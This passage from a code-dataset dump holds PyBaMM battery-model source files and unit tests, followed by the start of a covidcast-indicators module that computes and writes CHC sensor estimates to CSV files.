The potential in the current collector.
Returns
-------
variables : dict
The variables which can be derived from the potential in the
current collector.
"""
pot_scale = self.param.potential_scale
variables = {
"Negative current collector potential": phi_s_cn,
"Negative current collector potential [V]": phi_s_cn * pot_scale,
}
return variables
def _get_standard_potential_variables(self, phi_s_cn, phi_s_cp):
"""
A private function to obtain the standard variables which
can be derived from the potentials in the current collector.
Parameters
----------
phi_cc : :class:`pybamm.Symbol`
The potential in the current collector.
Returns
-------
variables : dict
The variables which can be derived from the potential in the
current collector.
"""
pot_scale = self.param.potential_scale
U_ref = self.param.U_p_ref - self.param.U_n_ref
# add more to this
variables = {
"Positive current collector potential": phi_s_cp,
"Positive current collector potential [V]": U_ref + phi_s_cp * pot_scale,
"Local potential difference": phi_s_cp - phi_s_cn,
"Local potential difference [V]": U_ref + (phi_s_cp - phi_s_cn) * pot_scale,
}
variables.update(self._get_standard_negative_potential_variables(phi_s_cn))
return variables
def _get_standard_current_variables(self, i_cc, i_boundary_cc):
"""
A private function to obtain the standard variables which
can be derived from the current in the current collector.
Parameters
----------
i_cc : :class:`pybamm.Symbol`
The current in the current collector.
i_boundary_cc : :class:`pybamm.Symbol`
The current leaving the current collector and going into the cell
Returns
-------
variables : dict
The variables which can be derived from the current in the current
collector.
"""
i_typ = self.param.i_typ
# TO DO: implement grad in 2D to get i_cc
# just need this to get 1D models working for now
variables = {
"Current collector current density": i_boundary_cc,
"Current collector current density [A.m-2]": i_typ * i_boundary_cc,
}
return variables
```
#### File: stefan_maxwell/conductivity/first_order_stefan_maxwell_conductivity.py
```python
from .base_higher_order_stefan_maxwell_conductivity import BaseHigherOrder
class FirstOrder(BaseHigherOrder):
"""Class for conservation of charge in the electrolyte employing the
Stefan-Maxwell constitutive equations. (First order refers to a first-order
expression from the asymptotic reduction)
Parameters
----------
param : parameter class
The parameters to use for this submodel
domain : str, optional
The domain in which the model holds
**Extends:** :class:`pybamm.electrolyte.stefan_maxwell.conductivity.BaseHigerOrder`
"""
def __init__(self, param, domain=None):
super().__init__(param, domain)
def _higher_order_macinnes_function(self, x):
"Linear higher order terms"
return x
def unpack(self, variables):
"Unpack variables and return leading-order x-averaged values"
c_e_av = variables["Leading-order x-averaged electrolyte concentration"]
return c_e_av
```
#### File: submodels/interface/lithium_ion.py
```python
from .base_interface import BaseInterface
from . import inverse_kinetics, kinetics
class BaseInterfaceLithiumIon(BaseInterface):
"""
Base lthium-ion interface class
Parameters
----------
param :
model parameters
domain : str
The domain to implement the model, either: 'Negative' or 'Positive'.
**Extends:** :class:`pybamm.interface.BaseInterface`
"""
def __init__(self, param, domain):
super().__init__(param, domain)
self.reaction_name = "" # empty reaction name, assumed to be the main reaction
def _get_exchange_current_density(self, variables):
"""
A private function to obtain the exchange current density for a lithium-ion
deposition reaction.
Parameters
----------
variables: dict
` The variables in the full model.
Returns
-------
j0 : :class: `pybamm.Symbol`
The exchange current density.
"""
c_s_surf = variables[self.domain + " particle surface concentration"]
c_e = variables[self.domain + " electrolyte concentration"]
T = variables[self.domain + " electrode temperature"]
if self.domain == "Negative":
prefactor = self.param.m_n(T) / self.param.C_r_n
elif self.domain == "Positive":
prefactor = self.param.gamma_p * self.param.m_p(T) / self.param.C_r_p
j0 = prefactor * (
c_e ** (1 / 2) * c_s_surf ** (1 / 2) * (1 - c_s_surf) ** (1 / 2)
)
return j0
def _get_open_circuit_potential(self, variables):
"""
A private function to obtain the open circuit potential and entropic change
Parameters
----------
variables: dict
The variables in the full model.
Returns
-------
ocp : :class:`pybamm.Symbol`
The open-circuit potential
dUdT : :class:`pybamm.Symbol`
The entropic change in open-circuit potential due to temperature
"""
c_s_surf = variables[self.domain + " particle surface concentration"]
T = variables[self.domain + " electrode temperature"]
if self.domain == "Negative":
ocp = self.param.U_n(c_s_surf, T)
dUdT = self.param.dUdT_n(c_s_surf)
elif self.domain == "Positive":
ocp = self.param.U_p(c_s_surf, T)
dUdT = self.param.dUdT_p(c_s_surf)
return ocp, dUdT
def _get_number_of_electrons_in_reaction(self):
if self.domain == "Negative":
ne = self.param.ne_n
elif self.domain == "Positive":
ne = self.param.ne_p
return ne
class ButlerVolmer(BaseInterfaceLithiumIon, kinetics.ButlerVolmer):
"""
Extends :class:`BaseInterfaceLithiumIon` (for exchange-current density, etc) and
:class:`kinetics.ButlerVolmer` (for kinetics)
"""
def __init__(self, param, domain):
super().__init__(param, domain)
class InverseButlerVolmer(
BaseInterfaceLithiumIon, inverse_kinetics.InverseButlerVolmer
):
"""
Extends :class:`BaseInterfaceLithiumIon` (for exchange-current density, etc) and
:class:`inverse_kinetics.InverseButlerVolmer` (for kinetics)
"""
def __init__(self, param, domain):
super().__init__(param, domain)
```
#### File: submodels/porosity/full_reaction_driven_porosity.py
```python
import pybamm
from .base_porosity import BaseModel
class Full(BaseModel):
"""Full model for reaction-driven porosity changes
Parameters
----------
param : parameter class
The parameters to use for this submodel
**Extends:** :class:`pybamm.porosity.BaseModel`
"""
def __init__(self, param):
super().__init__(param)
def get_fundamental_variables(self):
eps = pybamm.standard_variables.eps
variables = self._get_standard_porosity_variables(eps)
return variables
def get_coupled_variables(self, variables):
j_n = variables["Negative electrode interfacial current density"]
j_p = variables["Positive electrode interfacial current density"]
deps_dt_n = -self.param.beta_surf_n * j_n
deps_dt_s = pybamm.FullBroadcast(
0, "separator", auxiliary_domains={"secondary": "current collector"}
)
deps_dt_p = -self.param.beta_surf_p * j_p
deps_dt = pybamm.Concatenation(deps_dt_n, deps_dt_s, deps_dt_p)
variables.update(self._get_standard_porosity_change_variables(deps_dt))
return variables
def set_rhs(self, variables):
eps = variables["Porosity"]
deps_dt = variables["Porosity change"]
self.rhs = {eps: deps_dt}
def set_initial_conditions(self, variables):
eps = variables["Porosity"]
self.initial_conditions = {eps: self.param.eps_init}
```
#### File: parameters/standard_current_functions/get_constant_current.py
```python
import pybamm
class GetConstantCurrent(pybamm.GetCurrent):
"""
Sets a constant input current for a simulation.
Parameters
----------
current : :class:`pybamm.Symbol` or float
The size of the current in Amperes.
**Extends:"": :class:`pybamm.GetCurrent`
"""
def __init__(self, current=pybamm.electrical_parameters.I_typ):
self.parameters = {"Current [A]": current}
self.parameters_eval = {"Current [A]": current}
def __str__(self):
return "Constant current"
def __call__(self, t):
return self.parameters_eval["Current [A]"]
```
#### File: PyBaMM/tests/shared.py
```python
import pybamm
from scipy.sparse import eye
class SpatialMethodForTesting(pybamm.SpatialMethod):
"""Identity operators, no boundary conditions."""
def __init__(self, mesh):
super().__init__(mesh)
def gradient(self, symbol, discretised_symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
gradient_matrix = pybamm.Matrix(eye(n))
return gradient_matrix @ discretised_symbol
def divergence(self, symbol, discretised_symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
divergence_matrix = pybamm.Matrix(eye(n))
return divergence_matrix @ discretised_symbol
def internal_neumann_condition(
self, left_symbol_disc, right_symbol_disc, left_mesh, right_mesh
):
return pybamm.Scalar(0)
def mass_matrix(self, symbol, boundary_conditions):
n = 0
for domain in symbol.domain:
n += self.mesh[domain][0].npts
mass_matrix = pybamm.Matrix(eye(n))
return mass_matrix
def get_mesh_for_testing(
xpts=None, rpts=10, ypts=15, zpts=15, geometry=None, cc_submesh=None
):
param = pybamm.ParameterValues(
values={
"Electrode width [m]": 0.4,
"Electrode height [m]": 0.5,
"Negative tab width [m]": 0.1,
"Negative tab centre y-coordinate [m]": 0.1,
"Negative tab centre z-coordinate [m]": 0.0,
"Positive tab width [m]": 0.1,
"Positive tab centre y-coordinate [m]": 0.3,
"Positive tab centre z-coordinate [m]": 0.5,
"Negative electrode thickness [m]": 0.3,
"Separator thickness [m]": 0.3,
"Positive electrode thickness [m]": 0.3,
}
)
if geometry is None:
geometry = pybamm.Geometry("1D macro", "1D micro")
param.process_geometry(geometry)
submesh_types = {
"negative electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"separator": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"negative particle": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive particle": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"current collector": pybamm.MeshGenerator(pybamm.SubMesh0D),
}
if cc_submesh:
submesh_types["current collector"] = cc_submesh
if xpts is None:
xn_pts, xs_pts, xp_pts = 40, 25, 35
else:
xn_pts, xs_pts, xp_pts = xpts, xpts, xpts
var = pybamm.standard_spatial_vars
var_pts = {
var.x_n: xn_pts,
var.x_s: xs_pts,
var.x_p: xp_pts,
var.r_n: rpts,
var.r_p: rpts,
var.y: ypts,
var.z: zpts,
}
return pybamm.Mesh(geometry, submesh_types, var_pts)
def get_p2d_mesh_for_testing(xpts=None, rpts=10):
geometry = pybamm.Geometry("1D macro", "1+1D micro")
return get_mesh_for_testing(xpts=xpts, rpts=rpts, geometry=geometry)
def get_1p1d_mesh_for_testing(
xpts=None, zpts=15, cc_submesh=pybamm.MeshGenerator(pybamm.Uniform1DSubMesh)
):
geometry = pybamm.Geometry("1+1D macro")
return get_mesh_for_testing(
xpts=xpts, zpts=zpts, geometry=geometry, cc_submesh=cc_submesh
)
def get_2p1d_mesh_for_testing(
xpts=None,
ypts=15,
zpts=15,
cc_submesh=pybamm.MeshGenerator(pybamm.ScikitUniform2DSubMesh),
):
geometry = pybamm.Geometry("2+1D macro")
return get_mesh_for_testing(
xpts=xpts, zpts=zpts, geometry=geometry, cc_submesh=cc_submesh
)
def get_unit_2p1D_mesh_for_testing(ypts=15, zpts=15):
param = pybamm.ParameterValues(
values={
"Electrode width [m]": 1,
"Electrode height [m]": 1,
"Negative tab width [m]": 1,
"Negative tab centre y-coordinate [m]": 0.5,
"Negative tab centre z-coordinate [m]": 0,
"Positive tab width [m]": 1,
"Positive tab centre y-coordinate [m]": 0.5,
"Positive tab centre z-coordinate [m]": 1,
"Negative electrode thickness [m]": 0.3,
"Separator thickness [m]": 0.3,
"Positive electrode thickness [m]": 0.3,
}
)
geometry = pybamm.Geometryxp1DMacro(cc_dimension=2)
param.process_geometry(geometry)
var = pybamm.standard_spatial_vars
var_pts = {var.x_n: 3, var.x_s: 3, var.x_p: 3, var.y: ypts, var.z: zpts}
submesh_types = {
"negative electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"separator": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"positive electrode": pybamm.MeshGenerator(pybamm.Uniform1DSubMesh),
"current collector": pybamm.MeshGenerator(pybamm.ScikitUniform2DSubMesh),
}
return pybamm.Mesh(geometry, submesh_types, var_pts)
def get_discretisation_for_testing(
xpts=None, rpts=10, mesh=None, cc_method=SpatialMethodForTesting
):
if mesh is None:
mesh = get_mesh_for_testing(xpts=xpts, rpts=rpts)
spatial_methods = {
"macroscale": SpatialMethodForTesting,
"negative particle": SpatialMethodForTesting,
"positive particle": SpatialMethodForTesting,
"current collector": cc_method,
}
return pybamm.Discretisation(mesh, spatial_methods)
def get_p2d_discretisation_for_testing(xpts=None, rpts=10):
return get_discretisation_for_testing(mesh=get_p2d_mesh_for_testing(xpts, rpts))
def get_1p1d_discretisation_for_testing(xpts=None, zpts=15):
return get_discretisation_for_testing(mesh=get_1p1d_mesh_for_testing(xpts, zpts))
def get_2p1d_discretisation_for_testing(xpts=None, ypts=15, zpts=15):
return get_discretisation_for_testing(
mesh=get_2p1d_mesh_for_testing(xpts, ypts, zpts),
cc_method=pybamm.ScikitFiniteElement,
)
```
#### File: unit/test_expression_tree/test_functions.py
```python
import pybamm
import unittest
import numpy as np
import autograd.numpy as auto_np
from scipy.interpolate import interp1d
def test_function(arg):
return arg + arg
def test_const_function():
return 1
def test_multi_var_function(arg1, arg2):
return arg1 + arg2
class TestFunction(unittest.TestCase):
def test_constant_functions(self):
d = pybamm.Scalar(6)
funcd = pybamm.Function(test_const_function, d)
self.assertEqual(funcd.evaluate(), 1)
def test_function_of_one_variable(self):
a = pybamm.Symbol("a")
funca = pybamm.Function(test_function, a)
self.assertEqual(funca.name, "function (test_function)")
self.assertEqual(funca.children[0].name, a.name)
b = pybamm.Scalar(1)
sina = pybamm.Function(np.sin, b)
self.assertEqual(sina.evaluate(), np.sin(1))
self.assertEqual(sina.name, "function ({})".format(np.sin.__name__))
c = pybamm.Vector(np.linspace(0, 1))
cosb = pybamm.Function(np.cos, c)
np.testing.assert_array_equal(cosb.evaluate(), np.cos(c.evaluate()))
var = pybamm.StateVector(slice(0, 100))
y = np.linspace(0, 1, 100)[:, np.newaxis]
logvar = pybamm.Function(np.log1p, var)
np.testing.assert_array_equal(logvar.evaluate(y=y), np.log1p(y))
# use known_evals
np.testing.assert_array_equal(
logvar.evaluate(y=y, known_evals={})[0], np.log1p(y)
)
def test_with_autograd(self):
a = pybamm.StateVector(slice(0, 1))
y = np.array([5])
func = pybamm.Function(test_function, a)
self.assertEqual(func.diff(a).evaluate(y=y), 2)
self.assertEqual(func.diff(func).evaluate(), 1)
func = pybamm.Function(auto_np.sin, a)
self.assertEqual(func.evaluate(y=y), np.sin(a.evaluate(y=y)))
self.assertEqual(func.diff(a).evaluate(y=y), np.cos(a.evaluate(y=y)))
func = pybamm.Function(auto_np.exp, a)
self.assertEqual(func.evaluate(y=y), np.exp(a.evaluate(y=y)))
self.assertEqual(func.diff(a).evaluate(y=y), np.exp(a.evaluate(y=y)))
# multiple variables
func = pybamm.Function(test_multi_var_function, 4 * a, 3 * a)
self.assertEqual(func.diff(a).evaluate(y=y), 7)
def test_function_of_multiple_variables(self):
a = pybamm.Variable("a")
b = pybamm.Parameter("b")
func = pybamm.Function(test_multi_var_function, a, b)
self.assertEqual(func.name, "function (test_multi_var_function)")
self.assertEqual(func.children[0].name, a.name)
self.assertEqual(func.children[1].name, b.name)
# test eval and diff
a = pybamm.StateVector(slice(0, 1))
b = pybamm.StateVector(slice(1, 2))
y = np.array([5, 2])
func = pybamm.Function(test_multi_var_function, a, b)
self.assertEqual(func.evaluate(y=y), 7)
self.assertEqual(func.diff(a).evaluate(y=y), 1)
self.assertEqual(func.diff(b).evaluate(y=y), 1)
self.assertEqual(func.diff(func).evaluate(), 1)
def test_exceptions(self):
a = pybamm.Variable("a", domain="something")
b = pybamm.Variable("b", domain="something else")
with self.assertRaises(pybamm.DomainError):
pybamm.Function(test_multi_var_function, a, b)
def test_function_unnamed(self):
t = np.linspace(0, 1)
entries = 2 * t
interpfun = interp1d(t, entries)
fun = pybamm.Function(interpfun, pybamm.t)
self.assertEqual(
fun.name, "function (<class 'scipy.interpolate.interpolate.interp1d'>)"
)
class TestSpecificFunctions(unittest.TestCase):
def test_cos(self):
a = pybamm.Scalar(3)
fun = pybamm.cos(a)
self.assertIsInstance(fun, pybamm.Cos)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.cos(3))
self.assertEqual(fun.diff(a).evaluate(), -np.sin(3))
# test simplify
y = pybamm.StateVector(slice(0, 1))
fun = pybamm.cos(y)
self.assertEqual(fun.id, fun.simplify().id)
def test_cosh(self):
a = pybamm.Scalar(3)
fun = pybamm.cosh(a)
self.assertIsInstance(fun, pybamm.Cosh)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.cosh(3))
self.assertEqual(fun.diff(a).evaluate(), np.sinh(3))
def test_exp(self):
a = pybamm.Scalar(3)
fun = pybamm.exp(a)
self.assertIsInstance(fun, pybamm.Exponential)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.exp(3))
self.assertEqual(fun.diff(a).evaluate(), np.exp(3))
def test_log(self):
a = pybamm.Scalar(3)
fun = pybamm.log(a)
self.assertIsInstance(fun, pybamm.Log)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.log(3))
self.assertEqual(fun.diff(a).evaluate(), 1 / 3)
def test_max(self):
a = pybamm.Vector(np.array([1, 2, 3]))
fun = pybamm.max(a)
self.assertIsInstance(fun, pybamm.Function)
self.assertEqual(fun.evaluate(), 3)
def test_min(self):
a = pybamm.Vector(np.array([1, 2, 3]))
fun = pybamm.min(a)
self.assertIsInstance(fun, pybamm.Function)
self.assertEqual(fun.evaluate(), 1)
def test_sin(self):
a = pybamm.Scalar(3)
fun = pybamm.sin(a)
self.assertIsInstance(fun, pybamm.Sin)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.sin(3))
self.assertEqual(fun.diff(a).evaluate(), np.cos(3))
def test_sinh(self):
a = pybamm.Scalar(3)
fun = pybamm.sinh(a)
self.assertIsInstance(fun, pybamm.Sinh)
self.assertEqual(fun.children[0].id, a.id)
self.assertEqual(fun.evaluate(), np.sinh(3))
self.assertEqual(fun.diff(a).evaluate(), np.cosh(3))
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_expression_tree/test_interpolant.py
```python
import pybamm
import unittest
import numpy as np
class TestInterpolant(unittest.TestCase):
def test_errors(self):
with self.assertRaisesRegex(ValueError, "data should have exactly two columns"):
pybamm.Interpolant(np.ones(10), None)
with self.assertRaisesRegex(ValueError, "interpolator 'bla' not recognised"):
pybamm.Interpolant(np.ones((10, 2)), None, interpolator="bla")
def test_interpolation(self):
x = np.linspace(0, 1)[:, np.newaxis]
y = pybamm.StateVector(slice(0, 2))
# linear
linear = np.hstack([x, 2 * x])
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(linear, y, interpolator=interpolator)
np.testing.assert_array_almost_equal(
interp.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([0.794, 3])
)
# square
square = np.hstack([x, x ** 2])
y = pybamm.StateVector(slice(0, 1))
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(square, y, interpolator=interpolator)
np.testing.assert_array_almost_equal(
interp.evaluate(y=np.array([0.397]))[:, 0], np.array([0.397 ** 2])
)
# with extrapolation set to False
for interpolator in ["pchip", "cubic spline"]:
interp = pybamm.Interpolant(
square, y, interpolator=interpolator, extrapolate=False
)
np.testing.assert_array_equal(
interp.evaluate(y=np.array([2]))[:, 0], np.array([np.nan])
)
def test_name(self):
a = pybamm.Symbol("a")
x = np.linspace(0, 1)[:, np.newaxis]
interp = pybamm.Interpolant(np.hstack([x, x]), a, "name")
self.assertEqual(interp.name, "interpolating function (name)")
def test_diff(self):
x = np.linspace(0, 1)[:, np.newaxis]
y = pybamm.StateVector(slice(0, 2))
# linear (derivative should be 2)
linear = np.hstack([x, 2 * x])
for interpolator in ["pchip", "cubic spline"]:
interp_diff = pybamm.Interpolant(linear, y, interpolator=interpolator).diff(
y
)
np.testing.assert_array_almost_equal(
interp_diff.evaluate(y=np.array([0.397, 1.5]))[:, 0], np.array([2, 2])
)
# square (derivative should be 2*x)
square = np.hstack([x, x ** 2])
for interpolator in ["pchip", "cubic spline"]:
interp_diff = pybamm.Interpolant(square, y, interpolator=interpolator).diff(
y
)
np.testing.assert_array_almost_equal(
interp_diff.evaluate(y=np.array([0.397, 0.806]))[:, 0],
np.array([0.794, 1.612]),
decimal=3,
)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_expression_tree/test_vector.py
```python
import pybamm
import numpy as np
import unittest
class TestVector(unittest.TestCase):
def setUp(self):
self.x = np.array([[1], [2], [3]])
self.vect = pybamm.Vector(self.x)
def test_array_wrapper(self):
self.assertEqual(self.vect.ndim, 2)
self.assertEqual(self.vect.shape, (3, 1))
self.assertEqual(self.vect.size, 3)
def test_column_reshape(self):
vect1d = pybamm.Vector(np.array([1, 2, 3]))
np.testing.assert_array_equal(self.vect.entries, vect1d.entries)
def test_vector_evaluate(self):
np.testing.assert_array_equal(self.vect.evaluate(), self.x)
def test_vector_operations(self):
np.testing.assert_array_equal((self.vect + self.vect).evaluate(), 2 * self.x)
np.testing.assert_array_equal((self.vect - self.vect).evaluate(), 0 * self.x)
np.testing.assert_array_equal(
(self.vect * self.vect).evaluate(), np.array([[1], [4], [9]])
)
def test_vector_modification(self):
exp = self.vect * self.vect + self.vect
self.x[0] = -1
self.assertTrue(exp.children[1]._entries[0], -1)
self.assertTrue(exp.children[0].children[0]._entries[0], -1)
self.assertTrue(exp.children[0].children[1]._entries[0], -1)
def test_wrong_size_entries(self):
with self.assertRaisesRegex(
ValueError, "Entries must have 1 dimension or be column vector"
):
pybamm.Vector(np.ones((4, 5)))
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: test_interface/test_kinetics/test_tafel.py
```python
import pybamm
import unittest
class TestTafel(unittest.TestCase):
def test_forward_tafel(self):
submodel = pybamm.interface.kinetics.ForwardTafel(None, None)
j = submodel._get_kinetics(pybamm.Scalar(1), pybamm.Scalar(1), pybamm.Scalar(1))
self.assertIsInstance(j, pybamm.Symbol)
def test_backward_tafel(self):
submodel = pybamm.interface.kinetics.BackwardTafel(None, None)
j = submodel._get_kinetics(pybamm.Scalar(1), pybamm.Scalar(1), pybamm.Scalar(1))
self.assertIsInstance(j, pybamm.Symbol)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: unit/test_solvers/test_base_solver.py
```python
import pybamm
import unittest
class TestBaseSolver(unittest.TestCase):
def test_base_solver_init(self):
solver = pybamm.BaseSolver(rtol=1e-2, atol=1e-4)
self.assertEqual(solver.rtol, 1e-2)
self.assertEqual(solver.atol, 1e-4)
solver.rtol = 1e-5
self.assertEqual(solver.rtol, 1e-5)
solver.rtol = 1e-7
self.assertEqual(solver.rtol, 1e-7)
with self.assertRaises(NotImplementedError):
solver.compute_solution(None, None)
with self.assertRaises(NotImplementedError):
solver.set_up(None)
def test_step_or_solve_empty_model(self):
model = pybamm.BaseModel()
solver = pybamm.BaseSolver()
with self.assertRaisesRegex(pybamm.ModelError, "Cannot step empty model"):
solver.step(model, None)
with self.assertRaisesRegex(pybamm.ModelError, "Cannot solve empty model"):
solver.solve(model, None)
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
#### File: tests/unit/test_util.py
```python
import numpy as np
import os
import pybamm
import unittest
class TestUtil(unittest.TestCase):
"""
Test the functionality in util.py
"""
def test_load_function(self):
# Test filename ends in '.py'
with self.assertRaisesRegex(
ValueError, "Expected filename.py, but got doesnotendindotpy"
):
pybamm.load_function("doesnotendindotpy")
# Test exception if absolute file not found
with self.assertRaisesRegex(
ValueError, "is an absolute path, but the file is not found"
):
nonexistent_abs_file = os.path.join(os.getcwd(), "i_dont_exist.py")
pybamm.load_function(nonexistent_abs_file)
# Test exception if relative file not found
with self.assertRaisesRegex(
ValueError, "cannot be found in the PyBaMM directory"
):
pybamm.load_function("i_dont_exist.py")
# Test exception if relative file found more than once
with self.assertRaisesRegex(
ValueError, "found multiple times in the PyBaMM directory"
):
pybamm.load_function("__init__.py")
# Test exception if no matching function found in module
with self.assertRaisesRegex(ValueError, "No function .+ found in module .+"):
pybamm.load_function("process_symbol_bad_function.py")
# Test function load with absolute path
abs_test_path = os.path.join(
os.getcwd(),
"tests",
"unit",
"test_parameters",
"data",
"process_symbol_test_function.py",
)
self.assertTrue(os.path.isfile(abs_test_path))
func = pybamm.load_function(abs_test_path)
self.assertEqual(func(2), 246)
# Test function load with relative path
func = pybamm.load_function("process_symbol_test_function.py")
self.assertEqual(func(3), 369)
def test_rmse(self):
self.assertEqual(pybamm.rmse(np.ones(5), np.zeros(5)), 1)
self.assertEqual(pybamm.rmse(2 * np.ones(5), np.zeros(5)), 2)
self.assertEqual(pybamm.rmse(2 * np.ones(5), np.ones(5)), 1)
x = np.array([1, 2, 3, 4, 5])
self.assertEqual(pybamm.rmse(x, x), 0)
with self.assertRaisesRegex(ValueError, "same length"):
pybamm.rmse(np.ones(5), np.zeros(3))
def test_infinite_nested_dict(self):
d = pybamm.get_infinite_nested_dict()
d[1][2][3] = "x"
self.assertEqual(d[1][2][3], "x")
d[4][5] = "y"
self.assertEqual(d[4][5], "y")
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
```
|
{
"source": "JedGrabman/covidcast-indicators",
"score": 2
}
|
#### File: changehc/delphi_changehc/update_sensor.py
```python
import logging
from multiprocessing import Pool, cpu_count
import covidcast
from delphi_utils import GeoMapper, S3ArchiveDiffer, read_params
# third party
import numpy as np
import pandas as pd
# first party
from .config import Config, Constants
from .load_data import load_combined_data
from .sensor import CHCSensor
from .weekday import Weekday
from .constants import SIGNALS, SMOOTHED, SMOOTHED_ADJ, NA
def write_to_csv(output_dict, write_se, out_name, output_path="."):
"""Write sensor values to csv.
Args:
output_dict: dictionary containing sensor rates, se, unique dates, and unique geo_id
write_se: boolean to write out standard errors, if true, use an obfuscated name
out_name: name of the output file
output_path: outfile path to write the csv (default is current directory)
"""
if write_se:
logging.info(f"========= WARNING: WRITING SEs TO {out_name} =========")
geo_level = output_dict["geo_level"]
dates = output_dict["dates"]
geo_ids = output_dict["geo_ids"]
all_rates = output_dict["rates"]
all_se = output_dict["se"]
all_include = output_dict["include"]
out_n = 0
for i, d in enumerate(dates):
filename = "%s/%s_%s_%s.csv" % (
output_path,
(d + Config.DAY_SHIFT).strftime("%Y%m%d"),
geo_level,
out_name,
)
with open(filename, "w") as outfile:
outfile.write("geo_id,val,se,direction,sample_size\n")
for geo_id in geo_ids:
sensor = all_rates[geo_id][i]
se = all_se[geo_id][i]
if all_include[geo_id][i]:
assert not np.isnan(sensor), "value for included sensor is nan"
assert not np.isnan(se), "se for included sensor is nan"
if sensor > 90:
logging.warning(f"value suspiciously high, {geo_id}: {sensor}")
assert se < 5, f"se suspiciously high, {geo_id}: {se}"
if write_se:
assert sensor > 0 and se > 0, "p=0, std_err=0 invalid"
outfile.write(
"%s,%f,%s,%s,%s\n" % (geo_id, sensor, se, NA, NA))
else:
# for privacy reasons we will not report the standard error
outfile.write(
"%s,%f,%s,%s,%s\n" % (geo_id, sensor, NA, NA, NA)
)
out_n += 1
logging.debug(f"wrote {out_n} rows for {len(geo_ids)} {geo_level}")
def add_prefix(signal_names, wip_signal, prefix="wip_"):
"""Adds prefix to signal if there is a WIP signal
Parameters
----------
signal_names: List[str]
Names of signals to be exported
wip_signal : List[str] or bool
a list of wip signals: [], OR
all signals in the registry: True OR
only signals that have never been published: False
prefix : 'wip_'
prefix for new/non public signals
Returns
-------
List of signal names
wip/non wip signals for further computation
"""
if wip_signal is True:
return [prefix + signal for signal in signal_names]
if isinstance(wip_signal, list):
make_wip = set(wip_signal)
return [
prefix + signal if signal in make_wip else signal
for signal in signal_names
]
if wip_signal in {False, ""}:
return [
signal if public_signal(signal)
else prefix + signal
for signal in signal_names
]
raise ValueError("Supply True | False or '' or [] | list()")
def public_signal(signal_):
"""Checks if the signal name is already public using COVIDcast
Parameters
----------
signal_ : str
Name of the signal
Returns
-------
bool
True if the signal is present
False if the signal is not present
"""
epidata_df = covidcast.metadata()
for index in range(len(epidata_df)):
if epidata_df['signal'][index] == signal_:
return True
return False
class CHCSensorUpdator:
"""Contains methods to update sensor and write results to csv
"""
def __init__(self,
startdate,
enddate,
dropdate,
geo,
parallel,
weekday,
se):
"""Init Sensor Updator
Args:
startdate: first sensor date (YYYY-mm-dd)
enddate: last sensor date (YYYY-mm-dd)
dropdate: data drop date (YYYY-mm-dd)
geo: geographic resolution, one of ["county", "state", "msa", "hrr"]
parallel: boolean to run the sensor update in parallel
weekday: boolean to adjust for weekday effects
se: boolean to write out standard errors, if true, use an obfuscated name
"""
self.startdate, self.enddate, self.dropdate = [pd.to_datetime(t) for t in (startdate, enddate, dropdate)]
# handle dates
assert (self.startdate > (Config.FIRST_DATA_DATE + Config.BURN_IN_PERIOD)
), f"not enough data to produce estimates starting {self.startdate}"
assert self.startdate < self.enddate, "start date >= end date"
assert self.enddate <= self.dropdate, "end date > drop date"
assert geo in ['county', 'state', 'msa', 'hrr'], f"{geo} is invalid, pick one of 'county', 'state', 'msa', 'hrr'"
self.geo, self.parallel, self.weekday, self.se = geo.lower(), parallel, weekday, se
# output file naming
signals = SIGNALS.copy()
signals.remove(SMOOTHED if self.weekday else SMOOTHED_ADJ)
signal_names = add_prefix(
signals,
wip_signal=read_params()["wip_signal"])
self.updated_signal_names = signal_names
def shift_dates(self):
"""shift estimates forward to account for time lag, compute burnindates, sensordates
"""
drange = lambda s, e: pd.date_range(start=s,periods=(e-s).days,freq='D')
self.startdate = self.startdate - Config.DAY_SHIFT
self.burnindate = self.startdate - Config.BURN_IN_PERIOD
self.fit_dates = drange(Config.FIRST_DATA_DATE, self.dropdate)
self.burn_in_dates = drange(self.burnindate, self.dropdate)
self.sensor_dates = drange(self.startdate, self.enddate)
return True
def geo_reindex(self, data):
"""Reindex based on geography, include all date, geo pairs
Args:
data: dataframe, the output of loadcombineddata
staticpath: path for the static geographic files
Returns:
dataframe
"""
# get right geography
geo = self.geo
gmpr = GeoMapper()
if geo not in {"county", "state", "msa", "hrr"}:
logging.error(f"{geo} is invalid, pick one of 'county', 'state', 'msa', 'hrr'")
return False
if geo == "county":
data_frame = gmpr.fips_to_megacounty(data,Config.MIN_DEN,Config.MAX_BACKFILL_WINDOW,thr_col="den",mega_col=geo)
elif geo == "state":
data_frame = gmpr.replace_geocode(data, "fips", "state_id", new_col="state")
